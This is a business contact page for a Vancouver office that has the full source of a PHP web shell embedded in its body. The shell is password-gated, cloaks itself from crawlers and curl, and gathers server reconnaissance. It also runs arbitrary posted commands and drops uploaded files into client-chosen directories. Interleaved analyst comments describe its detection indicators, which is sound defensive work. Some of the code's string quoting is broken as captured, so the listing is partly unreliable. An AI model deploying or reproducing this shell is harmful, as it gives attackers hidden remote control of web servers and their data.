Plan A Contact Information

Our Office at #240 - 997 Seymour Street in Downtown Vancouver


		
			
				
					
<?php
// # br0k3nh34rtz mini uploader v.01 #
// # features : - undorkingable ( we dont permit common user agent of common search engine and shell scanner to crawl us :p ) #
// #            - login ( even though other hacker find this file, they have to input the password ) #
// #            - undetectable by waf ( we use post method to perform command shell and upload file ) #
// #            - auto download idxv3 shell #
// # and much more (havent made yet) #
// # thanks to : IndoXploit - Garuda Security Hacker - Gh0st_C0der - ./SetupID - Kashmiri_Cheetah - And other hacker in around the world #

// Analyst note: these statements are the setup stage of a password-gated PHP web shell
// (command execution plus file upload) that appears inline in the page text shown around it.
// Start the session that later carries the "logged in" flag; '@' hides any warning.
@session_start();
// Set the error reporting level to 0 so failures in this script are not reported.
@error_reporting(0);

// Unsalted MD5 hex digest; the submitted "pass" field is hashed and compared against it later.
// This literal and the "br0k3nh34rtz" banner are fixed strings usable for file-content searches.
$password = "54ddc3c7d064822eed932015d8740336"; //default : broken
$current  = getcwd();
$docroot  = $_SERVER["DOCUMENT_ROOT"];

// User-agent cloaking: any request whose User-Agent contains one of these crawler/tool names
// (case-insensitive) gets a 404 header and the script stops. Requests with an empty or absent
// User-Agent skip this check. A 404 returned to a crawler or curl-based check is therefore
// not evidence that the file is gone; confirm on disk.
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot", "curl");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

/**
 * Print the password prompt page and end the request.
 *
 * The form posts a single field named "pass" back to the same URL (empty action).
 * The page title/banner "br0k3nh34rtz" and the placeholder text are fixed strings in the
 * response body and can serve as content indicators when reviewing captured responses.
 */
function login(){
?>

<!DOCTYPE html>
<html>
<head>
	<title> br0k3nh34rtz &hearts; </title>
	<style>
		body{
			margin-top:10%;
			font-style: italic;
			background-color:black;
			color:green;
		}
		p{
			font-size:250%;
		}
		form input[type=password]{
			background: transparent;
			color:red;
			text-align: center;
			border: 1px dotted green;
			padding:7px 12px;
		}
	</style>
</head>
<body>
	<center>
		<p>
			br0k3nh34rtz
		</p>
		<form action="" method="POST">
			<input type="password" name="pass" placeholder="show me who you are">
		</form>
	</center>
</body>
</html>

<?php
// exit ends the script here, so nothing after the call to login() runs for this request.
exit;
}

/**
 * Report whether a given capability is present on the host, as an HTML "ON"/"OFF" fragment.
 *
 * "mysql" and "curl" are tested with function_exists(); "python", "perl" and "wget" are
 * tested by actually running "<tool> --help" through exec()/shell_exec(), which starts a
 * child process from PHP. Such probes can show up in process-creation telemetry.
 *
 * NOTE(review): as captured here the nested double quotes inside the string literals are not
 * escaped, and one closing tag reads "</foont>>". The text of this listing may therefore
 * differ from the bytes of the file on disk (presumably escaping was lost in capture), which
 * matters when deriving exact-match signatures from it.
 *
 * @param string $program one of "mysql", "curl", "python", "perl", "wget"
 * @return string HTML fragment, or a fixed message for any other value
 */
function check($program){
     switch($program){
          case "mysql":
               return (function_exists("mysqli_connect") or function_exists("mysql_connect"))?
               "<font color="yellow">ON</font>":"<font color="red">OFF</foont>>";
               break;
          case "curl":
               return (function_exists("curl_version"))?"<font color="yellow">ON</font>":"<font color="red">OFF</font>";
               break;
          case "python":
               return (@exec("python --help"))?"<font color="yellow">ON</font>":"<font color="red">OFF</font>";
               break;
          case "perl":
               return (@shell_exec("perl --help"))?"<font color="yellow">ON</font>":"<font color="red">OFF</font>";
               break;
          case "wget":
               return (@exec("wget --help"))?"<font color="yellow">ON</font>":"<font color="red">OFF</font>";
               break;
          default:
               return "there's no function as u input!";
     }
}

/**
 * Return the subset of four PHP command-execution functions that function_exists() reports
 * as available, in the fixed order listed below.
 *
 * Hardening note: when all four names are unavailable (for example via the disable_functions
 * ini directive, which function_exists() is expected to reflect; confirm for the PHP version
 * in use), this returns an empty array and the command branch of the page only prints a
 * message.
 *
 * @return array list of function-name strings, possibly empty
 */
function shell_func_detector(){
     $shell_func = array( //list of shell functions
          "shell_exec",
          "system",
          "exec",
          "passthru",
     );
     $allowed_shell_func = array();
     foreach($shell_func as $shell){ //detect allowed function
          if(!function_exists($shell)):
               continue;
          endif;
          $allowed_shell_func[] = $shell; //if its allowed, it'll be stored in array
     }
     return $allowed_shell_func; //return allowed shell func
}

/**
 * Run $command through the function named by $shell and wrap the result in <pre> tags.
 *
 * $shell is used as a variable function name and $command is handed to it unchanged; the
 * returned text is concatenated into HTML without escaping. This is the command-execution
 * primitive of the web shell: whatever string the caller supplies is executed on the host.
 *
 * @param string $shell   name of the PHP function to call
 * @param string $command command line passed to that function as-is
 * @return string HTML fragment
 */
function shell_execute($shell,$command){
	return "<pre>" . $shell($command) . "</pre>";
}

/**
 * Collect host reconnaissance details as a list of preformatted text lines.
 *
 * Gathers the resolved address of the Host header value, the web server software string,
 * php_uname() output, the PHP version, the available command-execution functions, and the
 * results of the tool/library probes done by check(). Because check() is called for
 * "python", "perl" and "wget", building this list starts those external programs.
 *
 * @return array list of strings, one per information line
 */
function info(){
	$info   = array();
	$info[] = "SERVER IP / DOMAIN : " . @gethostbyname($_SERVER["HTTP_HOST"]) . " / " . $_SERVER["HTTP_HOST"];
	$info[] = "WEB SERVER    	   : " . $_SERVER["SERVER_SOFTWARE"];
	$info[] = "SERVER SYSTEM      : " . @php_uname();
	$info[] = "PHP VERSION        : " . @phpversion();
	$info[] = "SHELL FUNCTION     : " . implode(" , ",shell_func_detector());
	$info[] = "LIB INSTALLED      : " . "PYTHON : " . check("python") . " | " . "PERL : " . check("perl")  . " | " . "WGET : " . check("wget") . " | " . "CURL : " . check("curl") . " | " .  "MYSQL : " . check("mysql");
	return $info;
}

/**
 * Read the disable_functions ini setting and split it on commas.
 *
 * This lets the operator see which PHP functions the host has disabled, i.e. it exposes the
 * server's hardening configuration to whoever is logged in to the shell.
 *
 * @return array list of function names as configured
 */
function disfunc(){
	$disfunc = @ini_get("disable_functions");
	$disfunc = explode(",",$disfunc);
	return $disfunc;
}

/**
 * Move an uploaded file into $dir under its client-supplied name and report the result.
 *
 * The destination is built by plain concatenation of $dir, "/" and $file["name"]; nothing in
 * this function checks the file name, extension, type or target directory. In this file the
 * caller passes $_POST["dir"] as $dir, so the directory is chosen by the client.
 * On success the response contains a link made by replacing the document root in the path
 * with the Host header value. New or unexpected files under the web root, and responses
 * containing "uploaded <a href='http://", are the observable effects of this routine.
 *
 * @param array  $file one entry of $_FILES (uses "tmp_name" and "name")
 * @param string $dir  destination directory
 * @return string HTML fragment describing success or failure
 */
function exec_uploader($file,$dir){
     global $docroot;
     $tmp      = $file["tmp_name"];
     $dest     = $dir . "/" . $file["name"];
     $uploaded = str_replace($docroot,$_SERVER["HTTP_HOST"],$dest);
     if( move_uploaded_file($tmp,$dest) ){
          return "<font color="yellow">uploaded <a href='http://$uploaded'>http:// $uploaded</a> !</font>";
     }else{
          return "<font color="red">unuploaded!</font>";
     }
}

// Authentication gate: the POSTed "pass" value is hashed with MD5 and compared to $password.
// On a match a session flag is set, so later requests are authorised by the session cookie
// alone and carry no password.
if( isset($_POST["pass"]) && md5($_POST["pass"]) === $password){
	$_SESSION["user"] = 1;
}

// With the flag present the script falls through to the control panel below (the "" statement
// is a no-op); otherwise login() prints the password form and ends the request.
if(isset($_SESSION["user"])){
	"";
}else{
	login();
}
?>

<!DOCTYPE html>
<html>
<head>
	<title>
		br0k3nh34rtz &hearts;
	</title>
	 <link href="https://fonts.googleapis.com/css?family=Ubuntu" rel="stylesheet">
	<style>
		body,header,nav,footer{margin:auto;width:83%;}
		body{
			background-color:black;
			font-family:"Ubuntu", monospace;
			font-size:14px;
			color:green;
		}
		header{
			border-style:none none solid none;
			padding:1.5% 1.5%;
		}
		header h1 em{color:red;font-size:35px;margin-left:2%;}
		header h1{font-style:italic;text-transform: capitalize;}
		header form.command{margin:2% 0%;}
		header form.command input,form.upload_file input{
			background:transparent;
			border-style: none none solid none;
			border-width: 1.9px;
		}
		header form.upload_file select{
			color:yellow;
			border:none;
			padding:0.5% 1.5%;
			border-style:none none solid none;
			border-color:green;
			border-width:1px;
			border-radius:2.5px;
		}
		nav{
			padding:2% 1.5%;
			text-align:center;
			border-style:none none solid none;
		}
		nav a{display:inline-block;margin-left:3.2%;text-decoration: none;color:yellow;}
		nav a:hover{color:white;font-size:14.5px;}
		main{margin:auto;width:85.5%;}
		main{margin-top:2%;}
		main em{color:red;font-size:14.5px;}
          main a{color:yellow;text-decoration:none;}
          main a:hover{color:white;}
	</style>
</head>
<body>
	<header>
		<h1> br0k3n mini uploader <em>&hearts;</em> </h1>
		<form action="?do=cmd" method="POST" class="command">
			<input type="text" name="command" placeholder="command">
			<input type="submit" value="+>>">
		</form>
          <form action="?do=up" method="POST" class="upload_file" enctype="multipart/form-data">
               <select name="dir">
                    <option value="<?= $docroot ?>">home_root</option>
                    <option value="<?= $current ?>">current_dir</option>
               </select>
               <input type="file" name="file_upload">
               <input type="submit" name="submit" value="+>>">
          </form>
	</header>
	<nav>
		<a href="?x=bhh"> [ _idx_shell_ ] </a>
		<a href="?x=disfunc"> [ disable_functions ] </a>
		<a href="?x=info"> [ server_info ] </a>
		<a href="?x=logout"> [ get_fucking_out ] </a>
	</nav>
	<main>
		<?php
		// Request dispatcher for the control panel. Actions are selected by the query string
		// ("x" or "do") while the payload travels in the POST body; the file's header comment
		// gives WAF evasion as the reason. Access logs that record only the URL will show
		// ?x=info, ?x=disfunc, ?x=bhh, ?x=logout, ?do=cmd and ?do=up but not the commands or
		// uploaded content, so POST-body or process-level logging is needed to see those.
		if(isset($_GET["x"])){
			switch($_GET["x"]){
				case "logout":
					// Drop the session and ask the client to reload this script.
					session_destroy();
					unset($_SESSION);
					header("Refresh: 0; " . $_SERVER["PHP_SELF"]);
					break;
				case "info":
					// Host reconnaissance listing.
					echo "<pre>";
					foreach( info() as $x ){
						echo $x . "<br>";
					}
					echo "</pre>";
					break;
				case "disfunc":
					// Show the configured disable_functions entries.
					foreach( disfunc() as $x){
						echo "<em>" . $x . "</em>" . " , ";
					}
					break;
				// "bhh" (linked from the nav bar as _idx_shell_) has no case here and lands in
				// default; the advertised "auto download idxv3 shell" is not present in this listing.
				default :
					echo "Do what you wanna do, boy!";
					break;
			}
		}elseif( isset($_GET["do"]) ){
               if($_GET["do"] === "up"){
                    // File upload: destination directory is taken straight from $_POST["dir"].
                    if( isset($_POST["submit"]) ){
                         echo exec_uploader($_FILES["file_upload"],$_POST["dir"]);
                    }else{
                         // Indonesian slang, roughly "unclear".
                         echo "gajelas";
                    }
               }
			if($_GET["do"] === "cmd"){
				if( count(shell_func_detector()) < 1){
					// Indonesian, roughly "can't, no shell function is enabled".
					echo "gabisa, gaada fungsi shell yang enabled!";
				}else{
					// Arbitrary command execution: $_POST["command"] is passed unchanged to the
					// first available function from shell_func_detector().
					echo shell_execute(shell_func_detector()[0],$_POST["command"]);
				}
			}
		}else{
               echo "Do what you wanna do, boy!";
          }
		?>

	</main>
</body>
</html>

Contact Form